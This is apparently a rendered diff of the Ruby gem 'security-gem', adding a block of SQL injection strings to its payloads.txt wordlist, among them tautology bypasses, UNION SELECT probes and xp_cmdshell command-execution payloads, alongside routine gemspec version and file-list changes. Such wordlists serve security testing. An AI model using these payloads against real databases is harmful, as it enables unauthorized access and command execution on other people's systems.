'%20or%20'x'='x
|
|
1785
|
+
')%20or%20('x'='x
|
|
1786
|
+
' or 0=0 --
|
|
1787
|
+
' or 0=0 #
|
|
1788
|
+
or 0=0 #"
|
|
1789
|
+
' or 1=1--
|
|
1790
|
+
' or '1'='1'--
|
|
1791
|
+
' or 1 --'
|
|
1792
|
+
or 1=1--
|
|
1793
|
+
' or 1=1 or ''='
|
|
1794
|
+
or 1=1 or ""=
|
|
1795
|
+
' or a=a--
|
|
1796
|
+
or a=a
|
|
1797
|
+
') or ('a'='a
|
|
1798
|
+
'hi' or 'x'='x';
|
|
1799
|
+
or
|
|
1800
|
+
procedure
|
|
1801
|
+
handler
|
|
1802
|
+
' or username like '%
|
|
1803
|
+
' or uname like '%
|
|
1804
|
+
' or userid like '%
|
|
1805
|
+
' or uid like '%
|
|
1806
|
+
' or user like '%
|
|
1807
|
+
'; exec master..xp_cmdshell
|
|
1808
|
+
'; exec xp_regread
|
|
1809
|
+
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
|
1810
|
+
--sp_password
|
|
1811
|
+
' UNION SELECT
|
|
1812
|
+
' UNION ALL SELECT
|
|
1813
|
+
' or (EXISTS)
|
|
1814
|
+
' (select top 1
|
|
1815
|
+
'||UTL_HTTP.REQUEST
|
|
1816
|
+
1;SELECT%20*
|
|
1817
|
+
<>"'%;)(&+
|
|
1818
|
+
'%20or%201=1
|
|
1819
|
+
'sqlattempt1
|
|
1820
|
+
%28
|
|
1821
|
+
%29
|
|
1822
|
+
%26
|
|
1823
|
+
%21
|
|
1824
|
+
' or ''='
|
|
1825
|
+
' or 3=3
|
|
1826
|
+
or 3=3 --
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: security-gem
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.3
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- tuckerweibell
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2022-05-
|
|
11
|
+
date: 2022-05-10 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description:
|
|
14
14
|
email:
|
|
@@ -30,6 +30,7 @@ files:
|
|
|
30
30
|
- lib/security/gem.rb
|
|
31
31
|
- lib/security/gem/builder.rb
|
|
32
32
|
- lib/security/gem/version.rb
|
|
33
|
+
- lib/security/test.rb
|
|
33
34
|
- payloads.txt
|
|
34
35
|
- security-gem.gemspec
|
|
35
36
|
homepage: https://github.com/tuckerweibell/security-gem
|